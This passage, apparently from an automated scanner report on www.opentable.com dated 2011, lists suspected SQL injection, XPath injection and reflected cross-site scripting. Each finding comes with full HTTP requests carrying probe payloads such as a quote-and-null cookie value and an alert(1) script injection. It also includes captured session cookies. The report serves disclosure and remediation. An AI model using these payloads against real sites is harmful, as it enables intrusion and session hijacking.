e="Powered By OpenTable: Restaurant Reservations. Right this way." class="footerPoweredByLogo" Text="Powered By OpenTable: Restaurant Reservations. Right this way." src="/img/buttons/poweredbyOpenTableStacked.png" style="border-width:0px;" />
...[SNIP]...

Request 2

GET /jaspers-corner-tap-and-kitchen''?rid=200&restref=200 HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.kimptonhotels.com/restaurants/restaurant-reservations.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; s_cc=true; s_nr=1317646509630-New; s_sq=%5B%5BB%5D%5D; restrefwhite=90; ftc=x=10%2f03%2f2011+15%3a54%3a50&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=153; lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=1&st=5; pgseq=

Response 2

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 12:55:22 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
Etag:
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:22 GMT; path=/
Set-Cookie: restrefwhite=200; domain=.opentable.com; path=/
Set-Cookie: ftc=x=10%2f03%2f2011+15%3a55%3a22&p1q=rid%3d200%26rid%3d200%26restref%3d200&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=153"&p1=117&rr1=200&rr2=200; domain=.opentable.com; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:22 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:22 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:22 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:22 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:22 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:22 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:22 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:22 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:22 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:22 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:22 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:22 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 5574


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head id="Head1"><BASE HREF="http://www.opentable.com/"><meta http-
...[SNIP]...

1.3. http://www.opentable.com/jscripts/ScriptHandler.ashx [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.opentable.com
Path:   /jscripts/ScriptHandler.ashx

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /jscripts/ScriptHandler.ashx'?f=jquery&z=true HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.grandcafe-sf.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pgseq=; ftc=x=10%2f03%2f2011+15%3a53%3a35&p1=220&p1q=rid%3d90%26restref%3d90%26bgcolor%3de3d4a4%26titlecolor%3d000000%26subtitlecolor%3d000000%26btnbgimage%3dhttp%253a%252f%252fwww.opentable.com%252ffrontdoor%252fimg%252fot_btn_black.png%26otlink%3dFFFFFF%26icon%3ddark%26mode%3dshort&c=0; lsCKE=ors=otrestref; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]

Response 1 (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 12:54:31 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-03
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:22-0800" exp "2009.12.01T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:31 GMT; path=/
Set-Cookie: restrefwhite=90; domain=.opentable.com; path=/
Set-Cookie: ftc=x=10%2f03%2f2011+15%3a54%3a31&p1=220&p1q=rid%3d90%26restref%3d90%26bgcolor%3de3d4a4%26titlecolor%3d000000%26subtitlecolor%3d000000%26btnbgimage%3dhttp%253a%252f%252fwww.opentable.com%252ffrontdoor%252fimg%252fot_btn_black.png%26otlink%3dFFFFFF%26icon%3ddark%26mode%3dshort&c=1&rr1=90&rr2=90&er=0&hr=http://www.grandcafe-sf.com/&tp=125; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:31 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:31 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:31 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:31 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:31 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:31 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:31 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:31 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:31 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:31 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:31 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:31 GMT; path=/
Vary: Accept-Encoding
Content-Length: 5548


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head id="Head1"><BASE HREF="http://www.opentable.com/"><meta http-
...[SNIP]...
<form name="Form1" method="post" action="500.aspx?aspxerrorpath=%2f404.aspx" id="Form1">
...[SNIP]...
<span id="lblMsgSubTitle">We're sorry, but we encountered a failure during the last operation. Please try again.</span>
...[SNIP]...
e="Powered By OpenTable: Restaurant Reservations. Right this way." class="footerPoweredByLogo" Text="Powered By OpenTable: Restaurant Reservations. Right this way." src="/img/buttons/poweredbyOpenTableStacked.png" style="border-width:0px;" />
...[SNIP]...

Request 2

GET /jscripts/ScriptHandler.ashx''?f=jquery&z=true HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.grandcafe-sf.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pgseq=; ftc=x=10%2f03%2f2011+15%3a53%3a35&p1=220&p1q=rid%3d90%26restref%3d90%26bgcolor%3de3d4a4%26titlecolor%3d000000%26subtitlecolor%3d000000%26btnbgimage%3dhttp%253a%252f%252fwww.opentable.com%252ffrontdoor%252fimg%252fot_btn_black.png%26otlink%3dFFFFFF%26icon%3ddark%26mode%3dshort&c=0; lsCKE=ors=otrestref; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]

Response 2

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 12:54:31 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
Etag:
X-OpenTableHost: SC-NA-WEB-08
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:20-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:31 GMT; path=/
Set-Cookie: restrefwhite=90; domain=.opentable.com; path=/
Set-Cookie: ftc=x=10%2f03%2f2011+15%3a54%3a31&p1=220&p1q=rid%3d90%26restref%3d90%26bgcolor%3de3d4a4%26titlecolor%3d000000%26subtitlecolor%3d000000%26btnbgimage%3dhttp%253a%252f%252fwww.opentable.com%252ffrontdoor%252fimg%252fot_btn_black.png%26otlink%3dFFFFFF%26icon%3ddark%26mode%3dshort&c=1&rr1=90&rr2=90&er=0&hr=http://www.grandcafe-sf.com/&tp=125; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:31 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:31 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:31 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:31 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:31 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:31 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:31 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:31 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:31 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:31 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:31 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:31 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 5552


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head id="Head1"><BASE HREF="http://www.opentable.com/"><meta http-
...[SNIP]...

2. XPath injection  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.opentable.com
Path:   /rest_profile.aspx

Issue detail

The lsCKE cookie appears to be vulnerable to XPath injection attacks. The payload %00' was submitted in the lsCKE cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Issue background

XPath injection vulnerabilities arise when user-controllable data is incorporated into XPath queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Depending on the purpose for which the vulnerable query is being used, an attacker may be able to exploit an XPath injection flaw to read sensitive application data or interfere with application logic.

Issue remediation

User input should be strictly validated before being incorporated into XPath queries. In most cases, it will be appropriate to accept input containing only short alhanumeric strings. At the very least, input containing any XPath metacharacters such as " ' / @ = * [ ] ( and ) should be rejected.

Request

GET /rest_profile.aspx?rid=200&restref=200 HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.kimptonhotels.com/restaurants/restaurant-reservations.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lsCKE=ors=otrestref%00'; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; restrefwhite=90; ftc=x=10%2f03%2f2011+15%3a54%3a44&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=153; pgseq=; s_cc=true; s_nr=1317646509630-New; s_sq=%5B%5BB%5D%5D

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 12:55:03 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-05
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:18-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Set-Cookie: pgseq=%2527%2527; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:03 GMT; path=/
Set-Cookie: restrefwhite=200; domain=.opentable.com; path=/
Set-Cookie: ftc=x=10%2f03%2f2011+15%3a55%3a03&p1q=rid%3d200%26rid%3d200%26restref%3d200&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=153%00'&p1=117&rr1=200&rr2=200; domain=.opentable.com; path=/
Set-Cookie: pgseq=%2527%2527; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:03 GMT; path=/
Set-Cookie: pgseq=%2527%2527; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:03 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref%00'&m=4&cbref=1&restref=200&vbefres=1&vbefreg=1; domain=.opentable.com; path=/
Set-Cookie: pgseq=%2527%2527; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:03 GMT; path=/
Set-Cookie: pgseq=%2527%2527; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:03 GMT; path=/
Set-Cookie: pgseq=%2527%2527; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:03 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref%00'&m=4&cbref=1&restref=200&vbefres=1&vbefreg=1; domain=.opentable.com; path=/
Set-Cookie: lsCKE=ors=otrestref%00'&m=4&cbref=1&restref=200&vbefres=1&vbefreg=1; domain=.opentable.com; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=13&vbefreg=13&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:55:03 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref%00'&m=4&cbref=1&restref=200&vbefres=1&vbefreg=1; domain=.opentable.com; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=13&vbefreg=13&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:55:03 GMT; path=/
Set-Cookie: pgseq=%2527%2527; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:03 GMT; path=/
Set-Cookie: pgseq=%2527%2527; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:03 GMT; path=/
Set-Cookie: pgseq=%2527%2527; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:03 GMT; path=/
Set-Cookie: pgseq=%2527%2527; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:03 GMT; path=/
Set-Cookie: pgseq=%2527%2527; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:03 GMT; path=/
Set-Cookie: pgseq=%2527%2527; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:03 GMT; path=/
Set-Cookie: pgseq=%2527%2527; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:03 GMT; path=/
Set-Cookie: pgseq=%2527%2527; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:03 GMT; path=/
Set-Cookie: pgseq=%2527%2527; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:03 GMT; path=/
Set-Cookie: pgseq=%2527%2527; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:03 GMT; path=/
Set-Cookie: pgseq=%2527%2527; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:03 GMT; path=/
Set-Cookie: pgseq=%2527%2527; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:03 GMT; path=/
Set-Cookie: pgseq=%2527%2527; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:03 GMT; path=/
Set-Cookie: pgseq=%2527%2527; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:03 GMT; path=/
Set-Cookie: pgseq=%2527%2527; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:03 GMT; path=/
Set-Cookie: jslt=DhNUH7QEwV0iX7fFVCSU3hhJUEcO4Lt8; domain=.opentable.com; path=/
Set-Cookie: pgseq=%2527%2527; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:03 GMT; path=/
Set-Cookie: pgseq=%2527%2527; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:03 GMT; path=/
Set-Cookie: pgseq=%2527%2527; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:03 GMT; path=/
Set-Cookie: pgseq=%2527%2527; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:03 GMT; path=/
Set-Cookie: pgseq=%2527%2527; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:03 GMT; path=/
Set-Cookie: pgseq=%2527%2527; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:03 GMT; path=/
Set-Cookie: pgseq=%2527%2527; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:03 GMT; path=/
Set-Cookie: pgseq=%2527%2527; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:03 GMT; path=/
Set-Cookie: pgseq=%2527%2527; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:03 GMT; path=/
Set-Cookie: pgseq=%2527%2527; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:03 GMT; path=/
Vary: Accept-Encoding
Content-Length: 199724


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns
...[SNIP]...
RAR8JX4UOhFln7kMNH6mfch22jHHy6DJT5k8UC/PHbtuza89m1Dpb4frwKts9iVxO7NXKBoJKuKdySxbGKxPQhGA/537GFK3jpq4pp+OuxyyL4fAsvwQa3V/Vmhojn9xjHtle08elp5ZmPrl2iSiHAtqpiq+fIjmPaC/uKoYUCSSkOV6hTvA7NxjZF5CTaAbfYvTCgX6WxpatHSmpTxwxmZYq0Rm+3UpFLK3YLJKLryaXoxgDlg6I90MQuuc+35Cn+deTP/8reoxLq74g3jdXQGEnjvNFe9gO0SLw340okK4hcrN9vI6XY5AiUaCmwJ/gTfyrLJtOyrNrQdlVT3rD82rS2ZxDvpBiNxhevBfX0vkrQFJ4Jc20FiI7xY9lubHSSXXU4nrbFaerD3uYzFVUDa
...[SNIP]...

3. Cross-site scripting (reflected)  previous  next
There are 24 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


3.1. http://www.opentable.com/interim.aspx [d parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /interim.aspx

Issue detail

The value of the d request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cf00e'%3balert(1)//25a9e3f968c was submitted in the d parameter. This input was echoed as cf00e';alert(1)//25a9e3f968c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /interim.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PMcf00e'%3balert(1)//25a9e3f968c&rtype=ism_mod HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.grandcafe-sf.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lsCKE=ors=otrestref; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; pgseq=; ftc=x=10%2f03%2f2011+15%3a54%3a43&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=0

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 12:54:53 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-05
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:18-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: restrefwhite=90; domain=.opentable.com; path=/
Set-Cookie: ftc=x=10%2f03%2f2011+15%3a54%3a53&p1q=rid%3d90%26restref%3d90%26m%3d4%26t%3dsingle%26p%3d2&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=153&p1=100&rr1=90&rr2=90; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=7&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
